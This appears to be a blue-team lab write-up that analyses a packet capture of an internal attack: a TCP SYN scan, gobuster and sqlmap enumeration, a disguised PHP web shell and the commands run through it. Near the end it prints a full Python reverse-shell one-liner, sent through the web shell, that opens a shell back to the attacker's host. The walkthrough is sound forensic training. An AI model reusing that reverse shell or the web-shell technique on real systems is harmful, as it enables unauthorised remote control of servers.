Scenario
The SOC received an alert in their SIEM for ‘Local to Local Port Scanning’ where an internal private IP began scanning another internal system. Can you investigate and determine if this activity is malicious or not? You have been provided a PCAP, investigate using any tools you wish.
What is the IP responsible for conducting the port scan activity?
First we’ll open the BTLOPortScan.pcap file in Wireshark simply take a quick scroll around to notice some suspicious traffic between two hosts. The [SYN], [RST, ACK] pattern tells us that someone is trying to open up a connection to lots of ports, and the connection gets reset by the server since the port is closed one way or another. This is to say that the IP address doing the scanning is 10.251.96.4.
What is the port range scanned by the suspicious host?
Now that we know which hosts we’re dealing with, we can use the filter ip.src == 10.251.96.4 && ip.dst == 10.251.96.5 to just focus on these two that matter.
To find the answer to the question we’ll use the Destinations and Ports statistics, and filter it with ip.addr == 10.251.96.5 to get a list of the ports that were scanned. Since we’re asked for the range we’ll just look at the lowest and highest port to know that the answer is 1-1024.
What is the type of port scan conducted?
In the first step we already noticed that we’re dealing with TCP traffic, and while using the first image as a reference makes it a bit hard to see, filtering with just the source and destination traffic it’s easy to see that the answer here is TCP SYN.
Two more tools were used to perform reconnaissance against open ports, what were they?
Finding out the two other tools used is a bit complicated, but starting with just looking at the overall traffic we can notice that lots of it is HTTP traffic, and furthermore there are lots of GET requests with what seems to be a more or less alphabetized list of directory names.
This hints at enumeration tool usage, and when we dig deeper into one of the packets we can find out from the data that a tool called gobuster 3.0.1 is indeed being used here. Gobuster is a tool that uses a list of terms to enumerate web server content by a simple bruteforce, and these lists generally consist of popular (sub)directory names to search for.
Using the same method we can find that the other tool used was sqlmap 1.4.7.
What is the name of the php file through which the attacker uploaded a web shell?
What is the name of the web shell that the attacker uploaded?
Next we’ll be focusing on HTTP POST requests since we know that we’re looking for something that relates to uploading a file. Very quickly we can notice a /upload.php file being used, and digging deeper there we’ll manage to find the answers to our next two questions in one.
First, the PHP file that was used to initiate the upload wasn’t actually the upload.php, as that’s the file that does the uploading. Instead we see that the referer file is called editprofile.php, and the file that was uploaded (should I even say, “fileToUpload”), i.e., the web shell, is called dbfunctions.php. It’s fair to expect that the attacker wanted to at least try to conceal the web shell, so they named the file to something that sounds like it would have a legitimate purpose on the system.
What is the parameter used in the web shell for executing commands?
What is the first command executed by the attacker?
Since we now know what the file that’s being used as the web shell it’s rather trivial to find out what it was used for. We can simply look at the instances where the dbfunctions.php file was accessed, and what the cmd parameter (?cmd= in the actual HTTP request) was pointed to. First one we’ll see is id, which was used to check the user and groups the user is in. Afterwards the attacker confirmed this with whoami before proceeding with their attack.
What is the type of shell connection the attacker obtains through command execution?
We know the attacker used a web shell, but what kind of shell connection were they able to establish afterwards? Looking further in the list of executed commands we can find a Python command that is used to launch a reverse shell. The whole command is a bit of a mess to read due to the percent encoding, but it is /uploads/dbfunctions.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
What is the port he uses for the shell connection?
From the command above we can see that the attacker was using the port 4422 for their reverse shell for SSH access.